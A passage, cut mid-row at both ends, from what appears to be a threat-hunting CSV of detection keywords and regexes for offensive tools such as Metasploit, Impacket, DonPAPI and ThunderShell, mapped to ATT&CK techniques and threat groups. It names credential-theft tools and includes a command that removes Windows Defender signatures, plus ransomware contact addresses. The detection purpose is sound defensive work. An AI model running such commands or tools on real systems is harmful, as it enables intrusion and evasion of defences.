template","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","52300" "*Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36*",".{0,1000}Mozilla\/6\.0\s\(Windows\sNT\s10\.0\;\sWin64\;\sx64\)\sAppleWebKit\/537\.36\s\(KHTML,\slike\sGecko\)\sChrome\/103\.0\.0\.0\sSafari\/537\.36.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","#useragent","malicious user agent used by graphstrike server (not a real one)","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","52302" "*mozilla2john.py*",".{0,1000}mozilla2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52303" "*mozlz4-win32.exe*",".{0,1000}mozlz4\-win32\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","52304" "*mozlz4-win32.exe*",".{0,1000}mozlz4\-win32\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - 
T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","52305" "*MpCmdRun.exe -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe\s\-RemoveDefinitions\s\-All.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","52308" "*MpCmdRun.exe* -RemoveDefinitions -All*",".{0,1000}MpCmdRun\.exe.{0,1000}\s\-RemoveDefinitions\s\-All.{0,1000}","offensive_tool_keyword","MpCmdRun","Removing all the signature from windows defender - used by a metasploit module","T1562.001","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52310" "*mpgn/BackupOperatorToDA*",".{0,1000}mpgn\/BackupOperatorToDA.{0,1000}","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","N/A","10","5","421","53","2025-01-04T14:16:46Z","2022-02-15T20:51:46Z","52312" "*mqtt_check.py*",".{0,1000}mqtt_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with 
network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52313" "*mr.un1k0d3r@gmail.com*",".{0,1000}mr\.un1k0d3r\@gmail\.com.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","#email","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","52314" "*Mr-B0b/SpaceRunner*",".{0,1000}Mr\-B0b\/SpaceRunner.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","52315" "*Mr-Cyb3rgh0st/Excel-Exploit*",".{0,1000}Mr\-Cyb3rgh0st\/Excel\-Exploit.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","N/A","1","20","3","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z","52316" "*mrd0x/BITB*",".{0,1000}mrd0x\/BITB.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","52317" "*mrd0x/PWA-Phishing*",".{0,1000}mrd0x\/PWA\-Phishing.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","1","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","52318" 
"*mremoteng_decrypt.py*",".{0,1000}mremoteng_decrypt\.py.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","8","2","146","42","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z","52319" "*mremoteng_decrypt.py*",".{0,1000}mremoteng_decrypt\.py.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","52320" "*mRemoteNG-local.py*",".{0,1000}mRemoteNG\-local\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","52321" "*MrEmpy/Reaper*",".{0,1000}MrEmpy\/Reaper.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","52322" "*Mr-Un1k0d3r/DKMC*",".{0,1000}Mr\-Un1k0d3r\/DKMC.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","52324" "*mrv44idagzu47oktcipn6tlll6nzapi6pk3u7ehsucl4hpxon45dl4yd.onion*",".{0,1000}mrv44idagzu47oktcipn6tlll6nzapi6pk3u7ehsucl4hpxon45dl4yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52325" "*ms.heisenberg@aol.com*",".{0,1000}ms\.heisenberg\@aol\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52326" "*ms_teams_exports_usernev_dll.txt*",".{0,1000}ms_teams_exports_usernev_dll\.txt.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","N/A","9","5","469","56","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z","52327" 
"*ms04_007_killbill.*",".{0,1000}ms04_007_killbill\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52328" "*ms14-068.py -u *",".{0,1000}ms14\-068\.py\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","52329" "*ms14-068.py -u*",".{0,1000}ms14\-068\.py\s\-u.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - 
T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","52330" "*ms14-068_check*",".{0,1000}ms14\-068_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","52331" "*ms16_075_reflection_juicy.rb*",".{0,1000}ms16_075_reflection_juicy\.rb.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","52332" "*ms17_010_eternalblue*",".{0,1000}ms17_010_eternalblue.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52333" "*ms17_010_eternalblue.*",".{0,1000}ms17_010_eternalblue\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52334" "*ms17_010_psexec*",".{0,1000}ms17_010_psexec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52335" "*ms17_010_psexec.*",".{0,1000}ms17_010_psexec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52336" "*MS17-010*",".{0,1000}MS17\-010.{0,1000}","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tool","https://github.com/worawit/MS17-010","1","0","N/A","N/A","N/A","10","2182","1098","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z","52337" "*ms17-010_check*",".{0,1000}ms17\-010_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","52338" "*MSBuild.exe NetLoader.xml*",".{0,1000}MSBuild\.exe\sNetLoader\.xml.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","52339" "*MSBuildShell*",".{0,1000}MSBuildShell.{0,1000}","offensive_tool_keyword","MSBuildShell","a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and 
Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). It will also bypass the Antimalware Scan Interface (AMSI). which provides enhanced malware protection for Powershell scripts","T1027 - T1086 - T1059 - T1064 - T1089","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/MSBuildShell","1","1","N/A","N/A","N/A","3","287","74","2019-08-02T06:46:52Z","2016-11-11T18:52:38Z","52340" "*MScholtes/PS2EXE*",".{0,1000}MScholtes\/PS2EXE.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","52341" "*msf*/logs/framework.log*",".{0,1000}msf.{0,1000}\/logs\/framework\.log.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52345" "*msf_api_doc.rb*",".{0,1000}msf_api_doc\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52346" "*msf_cve_extracter.py*",".{0,1000}msf_cve_extracter\.py.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1083 - T1069 - T1204 - T1059 - T1078","TA0007 - TA0005 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Chudry/Xerror","1","1","N/A","N/A","N/A","6","509","110","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z","52347" "*msf_exec.py*",".{0,1000}msf_exec\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52348" "*msf_matchers*",".{0,1000}msf_matchers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52349" "*msf_payload.ps1*",".{0,1000}msf_payload\.ps1.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","9","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","52350" "*MSF_WS_JSON_RPC_API_TOKEN*",".{0,1000}MSF_WS_JSON_RPC_API_TOKEN.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","52351" "*msf-auxiliarys*",".{0,1000}msf\-auxiliarys.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","52352" "*msfcallback.bin*",".{0,1000}msfcallback\.bin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - 
T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","52353" "*msfconsole *",".{0,1000}msfconsole\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52354" "*msfconsole*",".{0,1000}msfconsole.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
